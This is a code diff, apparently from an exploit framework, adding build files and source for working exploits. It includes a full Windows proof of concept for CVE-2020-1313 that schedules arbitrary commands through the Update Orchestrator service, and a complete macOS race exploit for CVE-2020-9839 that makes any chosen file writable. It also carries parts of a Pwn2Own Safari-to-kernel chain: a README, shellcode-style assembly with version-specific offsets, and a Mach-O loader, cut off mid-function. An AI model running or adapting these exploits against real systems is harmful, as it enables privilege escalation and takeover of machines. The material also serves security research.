+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
@@ -0,0 +1,22 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Source Files">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="Header Files">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
+    </Filter>
+    <Filter Include="Resource Files">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="Source.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+  </ItemGroup>
+</Project>
@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.30413.136
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2020-1313-exe", "cve-2020-1313-exe\cve-2020-1313-exe.vcxproj", "{8DF6CBFA-8BBD-4D2E-B410-940D230DD7DB}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|x64 = Debug|x64
+		Debug|x86 = Debug|x86
+		Release|x64 = Release|x64
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{8DF6CBFA-8BBD-4D2E-B410-940D230DD7DB}.Debug|x64.ActiveCfg = Debug|x64
+		{8DF6CBFA-8BBD-4D2E-B410-940D230DD7DB}.Debug|x64.Build.0 = Debug|x64
+		{8DF6CBFA-8BBD-4D2E-B410-940D230DD7DB}.Debug|x86.ActiveCfg = Debug|Win32
+		{8DF6CBFA-8BBD-4D2E-B410-940D230DD7DB}.Debug|x86.Build.0 = Debug|Win32
+		{8DF6CBFA-8BBD-4D2E-B410-940D230DD7DB}.Release|x64.ActiveCfg = Release|x64
+		{8DF6CBFA-8BBD-4D2E-B410-940D230DD7DB}.Release|x64.Build.0 = Release|x64
+		{8DF6CBFA-8BBD-4D2E-B410-940D230DD7DB}.Release|x86.ActiveCfg = Release|Win32
+		{8DF6CBFA-8BBD-4D2E-B410-940D230DD7DB}.Release|x86.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {5D418B3A-3253-404F-870A-FDB5B628FBEE}
+	EndGlobalSection
+EndGlobal
@@ -0,0 +1,154 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <VCProjectVersion>16.0</VCProjectVersion>
+    <Keyword>Win32Proj</Keyword>
+    <ProjectGuid>{8df6cbfa-8bbd-4d2e-b410-940d230dd7db}</ProjectGuid>
+    <RootNamespace>cve20201313exe</RootNamespace>
+    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+    <OutDir>..\..\..\..\..\..\data\exploits\cve-2020-1313</OutDir>
+    <TargetName>$(ProjectName).$(Platform)</TargetName>
+    <IntDir>$(Platform)\$(Configuration)\</IntDir>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+    <OutDir>..\..\..\..\..\..\data\exploits\cve-2020-1313</OutDir>
+    <TargetName>$(ProjectName).$(Platform)</TargetName>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="cve-2020-1313.cpp" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
@@ -0,0 +1,22 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Source Files">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="Header Files">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
+    </Filter>
+    <Filter Include="Resource Files">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="cve-2020-1313.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+  </ItemGroup>
+</Project>
@@ -0,0 +1,100 @@
+// Research and poc by Imre Rad
+
+#include <iostream>
+#include <string>
+#include <strsafe.h>
+#include <inttypes.h> /* For PRIu64 */
+#include <comdef.h>
+
+GUID CLSID_UniversalOrchestrator = { 0x9c695035,0x48d2,0x4229,{0x8b,0x73,0x4c,0x70,0xe7,0x56,0xe5,0x19} };
+
+class __declspec(uuid("c53f3549-0dbf-429a-8297-c812ba00742d")) IUniversalOrchestrator : public IUnknown {
+public:
+	virtual HRESULT __stdcall HasMoratoriumPassed(wchar_t* uscheduledId, int64_t* p1);//usosvc!UniversalOrchestrator::HasMoratoriumPassed
+	virtual HRESULT __stdcall ScheduleWork(wchar_t* uscheduledId, wchar_t* cmdLine, wchar_t* startArg, wchar_t* pauseArg);//usosvc!UniversalOrchestrator::ScheduleWork
+	virtual HRESULT __stdcall WorkCompleted(wchar_t* uscheduledId, int64_t p1);//usosvc!UniversalOrchestrator::WorkCompleted
+};
+_COM_SMARTPTR_TYPEDEF(IUniversalOrchestrator, __uuidof(IUniversalOrchestrator));
+
+
+void ThrowOnError(HRESULT hr)
+{
+	if (hr != 0)
+	{
+		throw _com_error(hr);
+	}
+}
+
+template <class myType>
+myType InitRemoteComStuff(GUID& clsid)
+{
+	myType service;
+	ThrowOnError(CoCreateInstance(clsid, nullptr, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&service)));
+
+	DWORD authn_svc;
+	DWORD authz_svc;
+	LPOLESTR principal_name;
+	DWORD authn_level;
+	DWORD imp_level;
+	RPC_AUTH_IDENTITY_HANDLE identity;
+	DWORD capabilities;
+
+	ThrowOnError(CoQueryProxyBlanket(service, &authn_svc, &authz_svc, &principal_name, &authn_level, &imp_level, &identity, &capabilities));
+	ThrowOnError(CoSetProxyBlanket(service, authn_svc, authz_svc, principal_name, authn_level, RPC_C_IMP_LEVEL_IMPERSONATE, identity, capabilities));
+
+	return service;
+}
+
+class CoInit
+{
+public:
+	CoInit() {
+		CoInitialize(nullptr);
+	}
+
+	~CoInit() {
+		CoUninitialize();
+	}
+};
+
+void CallUniversalOrchestrator(wchar_t* exe_to_run) {
+	wchar_t m_id[256];
+	wchar_t cmd_string[512];
+	CoInit coinit;
+	try
+	{
+		printf("Obtaining reference to IUniversalOrchestrator\n");
+		IUniversalOrchestratorPtr service = InitRemoteComStuff<IUniversalOrchestratorPtr>(CLSID_UniversalOrchestrator);
+
+		SYSTEMTIME time;
+		GetSystemTime(&time);
+		int64_t time_ms = (time.wSecond * 1000) + time.wMilliseconds;
+
+		swprintf_s(m_id, L"%" PRId64, time_ms);
+		swprintf_s(cmd_string, L"/c %s", exe_to_run);
+		wprintf(L"Scheduling work with id %ws\n", m_id);
+		ThrowOnError(service->ScheduleWork(
+			m_id,
+			const_cast<LPWSTR>(L"c:\\windows\\system32\\cmd.exe"),
+			const_cast<LPWSTR>(cmd_string), // start command args
+			const_cast<LPWSTR>(cmd_string)) // start command args
+		);
+		printf("Succeeded. You may verify HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WindowsUpdate\\Orchestrator\\UScheduler to see the task has indeed been onboarded. The command itself will be executed overnight if there is no user interaction on the box or after 3 days SLA has passed.\n");
+	}
+	catch (const _com_error& error)
+	{
+		printf("%ls\n", error.ErrorMessage());
+		printf("%08X\n", error.Error());
+	}
+}
+
+int wmain(int argc, wchar_t* argv[], wchar_t* envp[])
+{
+	if (argc != 2) {
+		wprintf(L"Incorrect parameter list: exe exe_to_run\n");
+	}
+	else {
+		CallUniversalOrchestrator(argv[1]);
+		return 0;
+	}
+}
@@ -0,0 +1,15 @@
+TARGET := exploit
+
+all: $(TARGET)
+
+$(TARGET): exploit.m
+	$(CC) -o $@ $^
+
+clean:
+	rm -f $(TARGET)
+
+install:
+	mkdir -p ../../../../data/exploits/CVE-2020-9839/
+	cp $(TARGET) ../../../../data/exploits/CVE-2020-9839/exploit
+
+.PHONY: all clean
@@ -0,0 +1,129 @@
+#include <sandbox.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <fcntl.h>
+#include <pwd.h>
+#include <string.h>
+#include <unistd.h>
+#include <mach/mach.h>
+#include <xpc/xpc.h>
+#include <pthread.h>
+
+char *TARGET;
+char *WRITABLE;
+char *USER;
+
+const int COUNT = 10000;
+int status = 0;
+bool pwned = false;
+
+void *race(void *arg) {
+	while(!pwned) {
+		symlink(TARGET, "!");
+		unlink("!/a.plist");
+		rmdir("!");
+		unlink("!");
+	}
+	return NULL;
+}
+
+void exploit() {
+	char *serviceName = "com.apple.cfprefsd.daemon";
+	status = 0;
+
+	xpc_connection_t conn;
+	xpc_object_t msg;
+
+	conn = xpc_connection_create_mach_service(serviceName, NULL, 0);
+	if (conn == NULL) {
+		perror("xpc_connection_create_mach_service");
+		return;
+	}
+
+	xpc_connection_set_event_handler(conn, ^(xpc_object_t obj) {
+		status++;
+	});
+
+	xpc_connection_resume(conn);
+
+	msg = xpc_dictionary_create(NULL, NULL, 0);
+	xpc_dictionary_set_int64(msg, "CFPreferencesOperation", 1);
+	xpc_dictionary_set_string(msg, "CFPreferencesUser", USER);
+	char writable_subpath[0x1000];
+	sprintf(writable_subpath, "%s%s", WRITABLE, "/!/a.plist");
+	xpc_dictionary_set_string(msg, "CFPreferencesDomain", writable_subpath);
+	xpc_dictionary_set_bool(msg, "CFPreferencesUseCorrectOwner", true);
+	xpc_dictionary_set_bool(msg, "CFPreferencesAvoidCache", true);
+	xpc_dictionary_set_string(msg, "Key", "key");
+	xpc_dictionary_set_string(msg, "Value", "value");
+
+	for(int i = 0; i < COUNT; i++) {
+		xpc_connection_send_message(conn, msg);
+	}
+
+	while(status < COUNT) {
+		usleep(100000);
+	}
+}
+
+void *pwn(void *arg) {
+	while(1) {
+		int testaccess = access(TARGET, W_OK);
+		if(!testaccess) {
+			printf("pwned! %s is now writable!\n", TARGET);
+			pwned = true;
+			break;
+		} else {
+			perror("access");
+		}
+		usleep(1000000);
+	}
+
+	return NULL;
+}
+
+static void
+connection_handler(xpc_connection_t peer)
+{
+	xpc_connection_set_event_handler(peer, ^(xpc_object_t event) {
+		printf("Message received: %p\n", event);
+	});
+
+	xpc_connection_resume(peer);
+}
+
+void make_writable(char * target) {
+	struct passwd *pw = getpwuid(getuid());
+	if(!pw) {
+		perror("getpwuid");
+		exit(1);
+	}
+
+	WRITABLE = pw->pw_dir;
+	USER = pw->pw_name;
+	TARGET = target;
+
+	setvbuf(stdout, 0, 2, 0);
+	chdir(WRITABLE);
+
+	pthread_t thread[2];
+	pthread_create(&thread[0], NULL, race, NULL);
+	pthread_create(&thread[1], NULL, pwn, NULL);
+	while(!pwned) {
+		printf("Trying %d calls...\n", COUNT);
+		exploit();
+	}
+	unlink("!/a.plist");
+	rmdir("!");
+	unlink("!");
+}
+
+int main(int argc, char *argv[]) {
+	if (argc < 2) {
+		printf("Usage: %s /file/to/make/writable\n", argv[0]);
+		return -1;
+	}
+	make_writable(argv[1]);
+	return 0;
+}
+
@@ -0,0 +1 @@
+/stage0.bin
@@ -0,0 +1,20 @@
+all: stage0.bin
+	make -C payload/loader
+	make -C payload/sbx
+
+stage0.bin: payload/stage0.asm
+	nasm -o $@ $<
+
+clean:
+	rm -f stage0.bin payload.js
+	make clean -C payload/loader
+	make clean -C payload/sbx
+
+install:
+	mkdir -p ../../../../data/exploits/CVE-2020-9850/
+	cp stage0.bin ../../../../data/exploits/CVE-2020-9850/stage0.bin
+	cp payload/loader/loader.bin ../../../../data/exploits/CVE-2020-9850/loader.bin
+	cp payload/sbx/sbx ../../../../data/exploits/CVE-2020-9850/sbx.bin
+	echo "Installed!"
+
+.PHONY: all clean
@@ -0,0 +1,50 @@
+Compromising the macOS Kernel through Safari by Chaining Six Vulnerabilities
+======================================================================================
+
+Overview
+---------
+This repository contains exploitation and technical details of [our Pwn2Own
+2020 winning submission targeting Apple Safari with a kernel escalation
+of privilege for macOS 10.15.3](https://www.thezdi.com/blog/2020/3/17/welcome-to-pwn2own-2020-the-schedule-and-live-results).
+For further information, you can also check [our Blackhat USA 2020
+slides](https://gts3.org/assets/papers/2020/jin:pwn2own2020-safari-slides.pdf).
+This repository also includes [our demo video](./movie.mov) for the succesful
+exploitation.
+
+
+Build from source
+-----------------
+
+```shell
+# Install xcode first
+$ python3 -m pip install --user "lief==0.10.1"
+$ make
+```
+
+Authors
+-------
+- Yonghwi Jin (jinmoteam@gmail.com)
+- Jungwon Lim (setuid0@protonmail.com)
+- Insu Yun (insu@gatech.edu)
+- Taesoo Kim (taesoo@gatech.edu)
+
+Citation
+--------
+```txt
+@inproceedings{jin:pwn2own2020-safari,
+  title        = {{Compromising the macOS kernel through Safari by chaining six vulnerabilities}},
+  author       = {Yonghwi Jin and Jungwon Lim and Insu Yun and Taesoo Kim},
+  booktitle    = {Black Hat USA Briefings (Black Hat USA)},
+  month        = aug,
+  year         = 2020,
+  address      = {Las Vegas, NV},
+}
+```
+
+Reference
+---------
+- https://github.com/sslab-gatech/pwn2own2020
+- https://github.com/saelo/pwn2own2018
+- https://github.com/LinusHenze/WebKit-RegEx-Exploit
+- https://github.com/niklasb/sploits/blob/master/safari/regexp-uxss.html
+- https://i.blackhat.com/eu-19/Thursday/eu-19-Wang-Thinking-Outside-The-JIT-Compiler-Understanding-And-Bypassing-StructureID-Randomization-With-Generic-And-Old-School-Methods.pdf
@@ -0,0 +1,2 @@
+/loader.bin
+/libloader.dylib
@@ -0,0 +1,14 @@
+CXXFLAGS := -fno-stack-protector -Os -DCURRENT_DIR=\"$(CURDIR)\" -std=c++17 -shared -fpic
+
+all: loader.bin
+
+loader.bin: libloader.dylib
+	./make.py $^ $@
+
+libloader.dylib: loader.cpp entry.s
+	$(CXX) $(CXXFLAGS)  $< -o $@
+
+clean:
+	rm loader.bin libloader.dylib
+
+.PHONY: all clean
@@ -0,0 +1,93 @@
+.intel_syntax noprefix
+.globl _dlopen_ptr
+.globl _dlsym_ptr
+
+lea rcx, [rbp+0x10]
+mov rax, [rbp+0x8]
+mov rdi, [rax+0x10]
+
+mov rax, [rsp] // return address
+sub rax, [rip+JSC_llint_entry_call_offset]
+mov r9, rax  // [scratch] r9 = JavaScriptCore.__TEXT.__text
+
+add rax, [rip+JSC_confstr_stub_offset]
+xor rbx, rbx
+mov ebx, [rax + 2]
+add rax, rbx
+add rax, 6
+mov rax, [rax]
+sub rax, [rip+libsystem_c_confstr_offset]
+mov r10, rax // [scratch] r10 = libsystem_c base
+
+mov rax, r10
+add rax, [rip+libsystem_c_dlopen_stub_offset]
+mov rsi, rax
+
+mov rax, r10
+add rax, [rip+libsystem_c_dlsym_stub_offset]
+mov rdx, rax
+
+call _main
+ret
+
+_main:
+    push rbp
+    mov rbp, rsp
+    push r14
+    push r15
+    and rsp, ~0xf
+
+    mov [rip+_dlopen_ptr], rsi
+    mov [rip+_dlsym_ptr], rdx
+
+    // rdi == library base pointer (mach-o header)
+    // rsi == argv
+    mov rsi, rcx
+    call _load
+
+    lea rsp, [rbp - 0x10]
+    pop r15
+    pop r14
+    pop rbp
+    ret
+
+_mmap:
+    push    rbp
+    mov     rbp, rsp
+    push    r15
+    push    r14
+    push    r12
+    push    rbx
+    mov eax, 0x20000C5
+    mov r10, rcx
+    syscall
+    pop     rbx
+    pop     r12
+    pop     r14
+    pop     r15
+    pop     rbp
+    ret
+
+_dlopen_ptr: .quad 0
+_dlsym_ptr: .quad 0
+
+JSC_confstr_stub_offset:        .quad 0x0FF5370041414141
+JSC_llint_entry_call_offset:    .quad 0x0FF5370041414142
+libsystem_c_confstr_offset:     .quad 0x0FF5370041414143
+libsystem_c_dlopen_stub_offset: .quad 0x0FF5370041414144
+libsystem_c_dlsym_stub_offset:  .quad 0x0FF5370041414145
+
+//10.15.3
+//JSC_confstr_stub_offset: .quad 0xE7D8B4
+//JSC_llint_entry_call_offset: .quad 0x00361f13
+//libsystem_c_confstr_offset: .quad 0x00002644
+//libsystem_c_dlopen_stub_offset: .quad 0x80430
+//libsystem_c_dlsym_stub_offset: .quad 0x80436
+
+//10.15.4
+//JSC_confstr_stub_offset: .quad 0xF96446
+//JSC_llint_entry_call_offset: .quad 0x00380a1d
+//libsystem_c_confstr_offset: .quad 0x00002be4
+//libsystem_c_dlopen_stub_offset: .quad 0x8021e
+//libsystem_c_dlsym_stub_offset: .quad 0x80224
+
@@ -0,0 +1,292 @@
+#include <mach-o/loader.h>
+#include <stdio.h>
+#include <sys/mman.h>
+#include <dlfcn.h>
+
+#define printf(...)
+#define setvbuf(...)
+
+extern void *(*dlopen_ptr)(const char *path, int mode);
+extern void *(*dlsym_ptr)(void *handle, const char *symbol);
+
+__asm__(".include \"" CURRENT_DIR "/entry.s\"");
+
+inline void exit(int n) {
+    printf("%d\n", n);
+}
+
+inline void memcpy(void *dst, void *src, size_t n) {
+    char *dst_ = (char *)dst, *src_ = (char *)src;
+    while(n--)
+        *dst_++ = *src_++;
+}
+
+inline int memcmp(void *dst, void *src, size_t n) {
+    char *dst_ = (char *)dst, *src_ = (char *)src;
+    while(n--) if(*dst_++ != *src_++) return 1;
+    return 0;
+}
+
+inline uint64_t read_uleb128(uint8_t*& p, uint8_t* end)
+{
+    uint64_t result = 0;
+    int         bit = 0;
+    do {
+        if ( p == end ) {
+            exit(1);
+            break;
+        }
+        uint64_t slice = *p & 0x7f;
+
+        if ( bit > 63 ) {
+            exit(2);
+            break;
+        }
+        else {
+            result |= (slice << bit);
+            bit += 7;
+        }
+    }
+    while (*p++ & 0x80);
+    return result;
+}
+
+inline void vm_(uint64_t base, void **libs, load_command **commands, void *mem, uint8_t *cmd, size_t size) {
+    uint8_t *p = cmd, *end = cmd + size;
+    int ordinal = 0, libIndex = 0;
+    const char *symbolName;
+    bool done = false;
+    uint8_t segIndex;
+    uintptr_t segOffset;
+    off_t offset;
+    int type;
+    // ported from dyld
+    while ( !done && (p < end) ) {
+        uint8_t immediate = *p & BIND_IMMEDIATE_MASK;
+        uint8_t opcode = *p & BIND_OPCODE_MASK;
+        ++p;
+        switch (opcode) {
+            case BIND_OPCODE_DONE:
+                break;
+            case BIND_OPCODE_SET_DYLIB_ORDINAL_IMM:
+                libIndex = immediate;
+                break;
+            case BIND_OPCODE_SET_DYLIB_ORDINAL_ULEB:
+                libIndex = (int)read_uleb128(p, end);
+                break;
+            case BIND_OPCODE_SET_DYLIB_SPECIAL_IMM:
+                // the special ordinals are negative numbers
+                if ( immediate == 0 )
+                    ordinal = 0;
+                else {
+                    int8_t signExtended = BIND_OPCODE_MASK | immediate;
+                    ordinal = signExtended;
+                }
+                break;
+            case BIND_OPCODE_ADD_ADDR_ULEB:
+                segOffset += read_uleb128(p, end);
+                break;
+            case BIND_OPCODE_SET_SYMBOL_TRAILING_FLAGS_IMM:
+                symbolName = (char*)p;
+                while (*p != '\0')
+                    ++p;
+                ++p;
+                break;
+            case BIND_OPCODE_SET_TYPE_IMM:
+                type = immediate;
+                break;
+            case BIND_OPCODE_SET_SEGMENT_AND_OFFSET_ULEB:
+                segIndex  = immediate;
+                segOffset = read_uleb128(p, end);
+                break;
+            case BIND_OPCODE_DO_BIND_ULEB_TIMES_SKIPPING_ULEB: {
+                uint64_t count = read_uleb128(p, end);
+                uint64_t skip = read_uleb128(p, end);
+                segOffset += count * (skip + sizeof(intptr_t));
+                break;
+            }
+            case BIND_OPCODE_DO_BIND_ADD_ADDR_IMM_SCALED:
+            case BIND_OPCODE_DO_BIND: {
+                void *res = dlsym_ptr(libs[libIndex], symbolName + 1);
